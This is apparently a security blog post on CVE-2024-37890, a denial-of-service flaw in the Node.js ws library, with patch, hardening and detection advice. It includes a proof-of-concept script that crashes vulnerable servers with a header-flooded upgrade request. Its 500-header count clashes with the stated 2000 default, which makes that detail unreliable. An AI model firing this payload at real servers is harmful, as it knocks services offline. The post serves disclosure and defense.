If you're running a Node.js WebSocket server using the popular ws library, you might be sitting on a time bomb. The newly discovered CVE-2024-37890 exposes a denial-of-service risk with a dangerously simple exploit: too many HTTP headers in the request. Let’s break down what it means, how it can be exploited, how to patch, and how to protect your apps right now.
## What Is CVE-2024-37890?
CVE-2024-37890 is a vulnerability in the ws WebSocket library for Node.js. A remote attacker can send a specially crafted request with an unusually large number of HTTP headers. If this exceeds server.maxHeadersCount, it crashes the ws server process. All they need is network access and a bit of code.
Fixed in:
- ws@8.17.1
- ws@7.5.10
- ws@6.2.3
- ws@5.2.4
Let’s look at what happens under the hood.
The ws server accepts new connections through Node.js's built-in HTTP/HTTPS servers. Node.js enforces the maxHeadersCount setting, which defaults to 2000 headers. When a request exceeds this number, Node's internal code can throw an error or behave unexpectedly.
In vulnerable versions of ws, if a WebSocket upgrade request with more than this number of headers comes in, the server can crash, potentially taking down all your WebSocket connections.
## A Simple Proof-of-Concept (PoC) Exploit
Here’s a Node.js script that triggers the bug by sending 500 dummy headers in a WebSocket upgrade request.
```js
const net = require('net');

const options = {
  host: 'localhost',
  port: 8080 // port the ws server under test listens on
};

const socket = net.connect(options, () => {
  // Compose an HTTP upgrade request carrying 500 dummy headers
  let req = "GET / HTTP/1.1\r\n";
  req += "Host: localhost\r\n";
  for (let i = 0; i < 500; i++) {
    req += `Header${i}: value\r\n`;
  }
  req += "Upgrade: websocket\r\n";
  req += "Connection: Upgrade\r\n";
  req += "Sec-WebSocket-Version: 13\r\n";
  req += "Sec-WebSocket-Key: fakekey==\r\n";
  req += "\r\n"; // blank line terminates the header block
  socket.write(req);
});
```
### What happens?
If the server is running an unpatched vulnerable ws version, it will likely crash, and all connections will be dropped.
## References
- GitHub Security Advisory: GHSA-55j3-2h2v-gv9x
- NPM Security Advisory for ws
- Fixed commit for ws@8.17.1
- Node.js HTTP server.maxHeadersCount docs
---
## How to Fix and Mitigate
- Upgrade ws. The best and simplest fix is to upgrade ws to the latest version in your project:

  ```bash
  npm install ws@latest
  ```

- Limit header size. Set the maximum HTTP header size in Node.js (v10.13.0+) when launching your server:

  ```bash
  node --max-http-header-size=8192 server.js
  ```

  Or in code:

  ```js
  const http = require('http');

  // app is your request handler (for example an Express app)
  const server = http.createServer({ maxHeaderSize: 8192 }, app);
  ```

- Control the header count. Set server.maxHeadersCount to 0 (which means *no limit*, but, in this context, this actually disables the crashing behavior):

  ```js
  server.maxHeadersCount = 0;
  ```

  > Warning: Setting it to 0 disables limits. It could expose you to massive memory usage if a client sends millions of headers.
---
## How to Check If You’re Vulnerable
List your ws version:
```bash
npm list ws
```
Look at the output. If the version is below the patched versions above, you are at risk.
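As an added example (not code from this article or from the ws project), the following two helpers automate the checks discussed above: one compares an installed ws version string (as printed by `npm list ws`) against the patched releases listed in this article, the other gates HTTP upgrade requests by header count before any WebSocket handshake is attempted. The limit of 100 headers and the 431 response are assumptions of this example; with ws you would pass the `handleUpgrade` method of a `noServer: true` WebSocketServer as the accept callback.

```javascript
// Added example (not from the article or the ws project): two defensive
// helpers for CVE-2024-37890 built only on Node.js built-ins.
// First patched release of each ws major line, as listed in this article.
const FIXED_WS = { 8: [8, 17, 1], 7: [7, 5, 10], 6: [6, 2, 3], 5: [5, 2, 4] };

// "ws@8.16.0" or "8.16.0" -> [8, 16, 0]; pre-release suffixes are ignored.
function parseVersion(v) {
  return v.replace(/^\D*/, '').split('-')[0].split('.').map(Number);
}

// Compare [major, minor, patch] tuples: negative, zero or positive.
function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    const d = (a[i] || 0) - (b[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

// True when the installed version predates the fix for its major line.
// Majors newer than 8 were released after the fix; majors older than 5
// never received one, so they count as vulnerable.
function isVulnerableWsVersion(version) {
  const v = parseVersion(version);
  if (v[0] > 8) return false;
  const fixed = FIXED_WS[v[0]];
  if (!fixed) return true;
  return compareVersions(v, fixed) < 0;
}

// req.rawHeaders alternates names and values, so two entries per header.
function headerCount(rawHeaders) {
  return rawHeaders.length / 2;
}

// Defense in depth: refuse upgrade requests carrying more than `limit` headers
// with a 431 before any WebSocket handshake runs. `onAccept` receives the
// requests that pass; with ws, pass a `noServer: true` WebSocketServer's
// handleUpgrade there. A limit of 100 is an assumption, not a ws default.
function gateUpgrades(server, limit, onAccept) {
  server.on('upgrade', (req, socket, head) => {
    if (headerCount(req.rawHeaders) > limit) {
      socket.end('HTTP/1.1 431 Request Header Fields Too Large\r\n' +
                 'Connection: close\r\n\r\n');
      return;
    }
    onAccept(req, socket, head);
  });
}
```

Wire it up with `gateUpgrades(httpServer, 100, (req, socket, head) => wss.handleUpgrade(req, socket, head, (ws) => wss.emit('connection', ws, req)))` so the count check runs before ws parses the request.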
---
## Who Is At Risk?
Anyone using ws on the public internet. This vulnerability is especially dangerous:
- For public-facing WebSocket APIs
- In shared server environments (multi-tenant)
- Where there is no reverse proxy filtering out abnormal headers
---
## Extra Hardening: Reverse Proxies
If you use nginx or haproxy, you can filter header size and count upstream from Node.js as an extra safety net.
Example (nginx):
```nginx
http {
    ...
    large_client_header_buffers 4 8k;
    ...
}
```
---
## Conclusion
CVE-2024-37890 is a straightforward but dangerous DoS vulnerability in the ws package for Node.js. All it takes is a big batch of HTTP headers. The fix is simple: upgrade your ws package now!
Don’t let your chat, game, or live WebSocket service go down because of a silly amount of HTTP headers!
---
If you found this article helpful, consider sharing with your team and updating your node dependencies right away.
*Stay secure!*
---
> Links for Further Reading:
> - ws Security Advisory on GitHub
> - Fixed code on GitHub
> - Node.js HTTP Docs
---
### Got questions? Drop a comment below!
## Timeline
Published on: 06/17/2024 20:15:13 UTC
Last modified on: 06/20/2024 12:44:22 UTC